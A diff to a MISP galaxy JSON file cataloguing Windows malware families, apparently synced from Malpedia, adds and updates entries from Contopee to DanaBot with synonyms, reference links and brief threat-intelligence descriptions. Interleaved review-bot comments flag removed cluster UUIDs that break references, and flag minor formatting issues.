+ "description": "FireEye described this malware as a proxy-aware backdoor that communicates using a custom-encrypted binary protocol. It may use the registry to store optional configuration data. The backdoor has been observed to support 26 commands that include directory traversal, file system manipulation, data archival and transmission, and command execution.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee",
+ "https://content.fireeye.com/apt/rpt-apt38",
+ "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
+ "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks"
+ ],
+ "synonyms": [
+ "WHITEOUT"
+ ],
+ "type": []
+ },
 "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de",
 "value": "Contopee"
 },
@@ -6204,9 +12098,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot",
- "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/",
- "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf",
- "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/"
+ "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/"
 ],
 "synonyms": [],
 "type": []
@@ -6219,7 +12111,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn",
- "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html"
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/",
+ "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html",
+ "https://www.symantec.com/security-center/writeup/2018-021216-4405-99#technicaldescription",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#atricle-content",
+ "https://blog.alyac.co.kr/2105"
 ],
 "synonyms": [],
 "type": []
@@ -6232,12 +12128,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "http://malware.prevenity.com/2014/08/malware-info.html",
 "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
- "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html",
- "http://malware.prevenity.com/2014/08/malware-info.html"
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html"
+ ],
+ "synonyms": [
+ "SOURFACE"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e",
@@ -6247,8 +12146,82 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore",
- "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coronavirus_ransomware",
+ "https://id-ransomware.blogspot.com/2020/03/coronavirus-ransomware.html"
+ ],
+ "synonyms": [
+ "CoronaVirus Cover-Ransomware"
+ ],
+ "type": []
+ },
+ "uuid": "ba683942-1524-459a-ad46-827464967164",
+ "value": "CoronaVirus Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx",
+ "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
+ "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
+ "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "47190b56-5176-4e8b-8c78-fcc10e511fa2",
+ "value": "Cotx RAT"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.covicli",
+ "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf"
+ ],
+ "synonyms": [
+ "Covically"
+ ],
+ "type": []
+ },
+ "uuid": "e8986c0c-2997-425d-ae4e-529f82d3fa48",
+ "value": "Covicli"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coviper",
+ "https://decoded.avast.io/janrubin/coviper-locking-down-computers-during-lockdown/",
+ "https://tccontre.blogspot.com/2020/04/covid19-malware-analysis-with-kill-mbr.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4d7d8496-52a6-47dc-abfe-4997af6dc465",
+ "value": "CoViper"
+ },
+ {
+ "description": "CRACKSHOT is a downloader that can download files, including binaries, and run them from the hard disk or execute them directly in memory. It is also capable of placing itself into a dormant state.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crackshot",
+ "https://content.fireeye.com/apt-41/rpt-apt41/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cfa111c1-3740-4832-8e89-12a536f4fff9",
+ "value": "crackshot"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore"
 ],
 "synonyms": [],
 "type": []
@@ -6257,24 +12230,19 @@
 "value": "CradleCore"
 },
 {
- "description": "",
+ "description": "According to Cisco Talos, CRAT is a remote access trojan with plugin capabilites, used by Lazarus since at least May 2020.",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride",
- "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/",
- "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf",
- "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/",
- "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/"
- ],
- "synonyms": [
- "Crash",
- "Industroyer"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crat",
+ "https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://blog.talosintelligence.com/2020/11/crat-and-plugins.html"
 ],
+ "synonyms": [],
 "type": []
 },
- "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6",
- "value": "CrashOverride"
+ "uuid": "ca901b56-b733-44af-aee2-38da79188dcb",
+ "value": "CRAT"
 },
 {
 "description": "",
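Review bot: The second hunk removes the CrashOverride cluster outright, including `"uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6"` and its `Crash`/`Industroyer` synonyms, and the Crisis (Windows) hunk further down does the same with `"uuid": "4b2ab902-811e-4b50-8510-43454d77d027"`. Galaxy cluster UUIDs are what relations in other galaxies and tags already attached to events on MISP instances point at, so dropping an entry silently breaks those references; if Malpedia renamed or merged these families, keeping the old entries in whatever deprecated form the cluster schema supports, or at least naming the removals in the commit message, would be preferable to a bare delete. The new CRAT description also has a typo, `plugin capabilites` should read `plugin capabilities`.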
@@ -6319,12 +12287,24 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson",
- "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
 "https://s.tencent.com/research/report/669.html",
- "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF"
+ "https://blog.yoroi.company/research/transparent-tribe-four-years-later",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF",
+ "https://securelist.com/transparent-tribe-part-2/98233/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.secrss.com/articles/24995",
+ "https://twitter.com/teamcymru/status/1351228309632385027",
+ "https://securelist.com/transparent-tribe-part-1/98127/",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
+ "https://www.secureworks.com/research/threat-profiles/copper-fieldstone",
+ "https://www.seqrite.com/blog/operation-honey-trap-apt36-targets-defense-organizations-in-india/"
 ],
 "synonyms": [
- "SEEDOOR"
+ "SEEDOOR",
+ "Scarimson"
 ],
 "type": []
 },
@@ -6332,19 +12312,67 @@
 "value": "Crimson RAT"
 },
 {
- "description": "",
+ "description": "According to ThreatConnect, CrimsonIAS is a Delphi-written backdoor dating back to at least 2017. It enables operators to run command line tools, exfiltrate files, and upload files to the infected machine. CrimsonIAS is notable as it listens for incoming connections only; making it different from typical Windows backdoors that beacons out.",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis",
- "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?",
- "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html",
- "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimsonias",
+ "https://threatconnect.com/blog/crimsonias-listening-for-an-3v1l-user/"
 ],
 "synonyms": [],
 "type": []
 },
- "uuid": "4b2ab902-811e-4b50-8510-43454d77d027",
- "value": "Crisis (Windows)"
+ "uuid": "6f2a68d1-06a9-4657-98d8-590a6446e475",
+ "value": "CrimsonIAS"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cring",
+ "https://twitter.com/swisscom_csirt/status/1354052879158571008"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f5a19987-d0b6-4cc3-89ab-d4540f2e9744",
+ "value": "Cring Ransomware"
+ },
+ {
+ "description": "According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.youtube.com/watch?v=8x-pGlWpIYI",
+ "https://www.carbonblack.com/2019/09/30/cb-threat-analysis-unit-technical-analysis-of-crosswalk/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://content.fireeye.com/apt-41/rpt-apt41/",
+ "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-state-sponsored-espionage-group-targeting-multiple-verticals-with-crosswalk/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage",
+ "https://twitter.com/MrDanPerez/status/1159459082534825986"
+ ],
+ "synonyms": [
+ "Motnug",
+ "ProxIP"
+ ],
+ "type": []
+ },
+ "uuid": "7ca7c08b-36fd-46b3-8b9e-a8b0d4743433",
+ "value": "CROSSWALK"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crutch",
+ "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e7dc138f-00cb-4db6-a6e7-3ecac853285d",
+ "value": "Crutch"
 },
 {
 "description": "",
@@ -6352,13 +12380,19 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl",
 "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx",
- "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware",
 "https://hackmag.com/security/ransomware-russian-style/",
 "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/",
 "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/",
+ "https://twitter.com/albertzsigovits/status/1217866089964679174",
+ "https://twitter.com/bartblaze/status/1305197264332369920",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://bartblaze.blogspot.com/2016/02/vipasana-ransomware-new-ransom-on-block.html",
+ "https://blog.checkpoint.com/2015/11/04/offline-ransomware-encrypts-your-data-without-cc-communication/",
 "https://twitter.com/demonslay335/status/971164798376468481"
 ],
- "synonyms": [],
+ "synonyms": [
+ "CryLock"
+ ],
 "type": []
 },
 "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f",
@@ -6403,12 +12437,57 @@
 "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2",
 "value": "Crypt0l0cker"
 },
+ {
+ "description": "A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot",
+ "https://www.gdatasoftware.com/blog/2020/02/35802-bitbucket-abused-as-malware-slinger"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2274aaf6-4807-4cda-8f5b-16a757f4ff23",
+ "value": "CryptBot"
+ },
+ {
+ "description": "CrypticConvo is a dropper trojan which appears to be embedded in an automatic generator framework to deliver the FakeM trojan. According to PaloaltoNetworks CrypticConvo and several additional trojans are believed to be included in a meta framework used by the \"Scarlet Mimic\" threat actor in order to quickly evade AV systems.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptic_convo",
+ "https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "972fbb7b-6945-42d8-ba88-a7b4e6fc1ad4",
+ "value": "CrypticConvo"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptodarkrubix",
+ "https://id-ransomware.blogspot.com/2020/03/cryptodarkrubix-ransomware.html"
+ ],
+ "synonyms": [
+ "Ranet"
+ ],
+ "type": []
+ },
+ "uuid": "c6d09bb2-5673-4b2b-b2cb-5d14f2568189",
+ "value": "CryptoDarkRubix"
+ },
 {
 "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker",
+ "https://sites.temple.edu/care/ci-rw-attacks/",
+ "https://www.secureworks.com/research/threat-profiles/gold-evergreen",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
 "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
 "https://www.secureworks.com/research/cryptolocker-ransomware"
 ],
 "synonyms": [],
@@ -6431,11 +12510,12 @@
 "value": "CryptoLuck"
 },
 {
- "description": "",
+ "description": "A variant of CryptoMix is win.clop. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix",
 "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/",
+ "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
 "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/"
 ],
 "synonyms": [
@@ -6446,6 +12526,19 @@
 "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921",
 "value": "CryptoMix"
 },
+ {
+ "description": "CryptoPatronum is a ransomware that encrypts user data through AES-256 (CBC) and it asks for BTC / ETH in order to get back the original files. In the ransom note there is not a title but only a reference to crsss.exe: its original file name. Once the files are encrypted, CryptoPatronum adds a .enc extension. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptopatronum",
+ "https://id-ransomware.blogspot.com/2020/01/cryptopatronum-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "738acbd6-d0b7-40fd-bc1b-d7fbb74cbbf9",
+ "value": "CryptoPatronum"
+ },
 {
 "description": "",
 "meta": {
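Review bot: The new CryptoMix description `A variant of CryptoMix is win.clop. ` and the new CryptoPatronum description both end with a trailing space inside the string, which no other description in these hunks does. `win.clop` is also Malpedia's internal family identifier rather than a cluster value, so a reader of the galaxy has to know that it maps to the Clop entry. Both look like export artefacts and are best trimmed and reworded at the source rather than patched in this file.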
@@ -6490,7 +12583,10 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://ryancor.medium.com/genetic-analysis-of-cryptowall-ransomware-843f86055c7f",
+ "https://sites.temple.edu/care/ci-rw-attacks/"
 ],
 "synonyms": [],
 "type": []
@@ -6517,7 +12613,6 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress",
 "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/",
- "https://www.lexsi.com/securityhub/cryptofortress/?lang=en",
 "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html"
 ],
 "synonyms": [],
@@ -6544,7 +12639,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx",
- "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/"
+ "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/",
+ "https://www.sentinelone.com/blog/sophisticated-new-packer-identified-in-cryptxxx-ransomware-sample/"
 ],
 "synonyms": [],
 "type": []
@@ -6565,19 +12661,43 @@
 "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9",
 "value": "CsExt"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ctb_locker",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://samvartaka.github.io/malware/2015/11/20/ctb-locker"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e8e28718-fe55-4d31-8b84-f8ff0acf0614",
+ "value": "CTB Locker"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba",
+ "https://id-ransomware.blogspot.com/2019/12/cuba-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6d9dfc5f-4ebf-404b-ab5e-e6497867fe65",
+ "value": "Cuba Ransomware"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe",
 "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
- "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451",
 "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html",
 "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal"
 ],
- "synonyms": [
- "Windshield?"
- ],
+ "synonyms": [],
 "type": []
 },
 "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9",
@@ -6596,12 +12716,27 @@
 "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09",
 "value": "Cueisfry"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cursed_murderer",
+ "https://id-ransomware.blogspot.com/2020/01/thecursedmurderer-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "600a73bf-d699-4400-ac35-6aed4ae5e528",
+ "value": "Cursed Murderer Ransomware"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet",
- "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html"
+ "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html",
+ "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html"
 ],
 "synonyms": [],
 "type": []
@@ -6613,7 +12748,18 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail",
+ "http://www.secureworks.com/research/threat-profiles/gold-essex",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-essex",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/"
 ],
 "synonyms": [],
 "type": []
@@ -6626,7 +12772,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate",
- "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://blog.reversinglabs.com/blog/rats-in-the-library",
+ "https://citizenlab.ca/2015/12/packrat-report/"
 ],
 "synonyms": [
 "Rebhip"
@@ -6661,6 +12811,87 @@
 "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8",
 "value": "CycBot"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat",
+ "https://www.gdatasoftware.com/blog/cyrat-ransomware",
+ "https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1995ed0a-81d9-43ca-9b38-6f001af84bbc",
+ "value": "Cyrat Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cysxl",
+ "https://www.enigmasoftware.com/bkdrcysxla-removal/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8db13fca-8f75-44dd-b507-e4d3f9c69d78",
+ "value": "cysxl"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls",
+ "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
+ "https://blog.netlab.360.com/dacls-the-dual-platform-rat/",
+ "https://www.sygnia.co/mata-framework",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7c2b19be-f06b-4b21-b003-144e92d291d1",
+ "value": "Dacls (Windows)"
+ },
+ {
+ "description": "DADJOKE was discovered as being distributed via email, targeting a South-East Asian Ministry of Defense. It is delivered as an embedded EXE file in a Word document using remote templates and a unique macro using multiple GET requests. The payload is deployed using load-order hijacking with a benign Windows Defender executable. Stage 1 has only beacon+download functionality, made to look like a PNG file.
Additional analysis by Kaspersky found 8 campaigns over 2019 and no activity prior to January 2019, DADJOKE is attributed with medium confidence to APT40.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke",
+ "https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9",
+ "https://twitter.com/a_tweeter_user/status/1154764787823316993",
+ "https://twitter.com/ClearskySec/status/1110941178231484417",
+ "https://www.youtube.com/watch?v=vx9IB88wXSE",
+ "https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/",
+ "https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3cf1aa5a-c19d-4b50-a604-e445e1e2b4f1",
+ "value": "DADJOKE"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache",
+ "https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a",
+ "https://medium.com/insomniacs/apt40-goes-from-template-injections-to-ole-linkings-for-payload-delivery-99eb43170a97",
+ "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign",
+ "https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html",
+ "https://twitter.com/killamjr/status/1204584085395517440",
+ "https://twitter.com/cyb3rops/status/1199978327697694720"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cd9aac83-bdd0-4622-ae77-405d5b9c1dc5",
+ "value": "DADSTACHE"
+ },
 {
 "description": "",
 "meta": {
@@ -6675,21 +12906,32 @@
 "value": "Dairy"
 },
 {
- "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ",
+ "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.
",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot",
- "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/",
- "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns",
- "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/",
- "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/",
- "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html",
- "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0",
+ "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf",
 "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/",
- "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
 "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/",
- "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/"
+ "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot",
+ "https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github",
+ "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html",
+ "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/",
